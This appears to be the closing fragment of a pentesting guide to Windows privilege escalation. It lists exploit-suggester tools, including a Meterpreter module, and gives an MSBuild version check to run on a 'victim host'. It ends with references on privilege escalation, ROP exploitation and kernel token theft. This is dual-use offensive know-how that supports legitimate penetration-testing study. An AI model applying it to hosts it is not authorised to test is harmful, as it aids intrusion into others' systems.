Windows Exploit Suggester Next Generation – Reads the output of systeminfo and recommends working exploits (local python)
Meterpreter
multi/recon/local_exploit_suggestor
You have to compile the project using the correct version of .NET (see this). To see the installed version of .NET on the victim host you can do:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
References
- http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft
- Check Point Research – Chasing the Silver Fox: Cat & Mouse in Kernel Shadows
- Unit 42 – Privileged File System Vulnerability Present in a SCADA System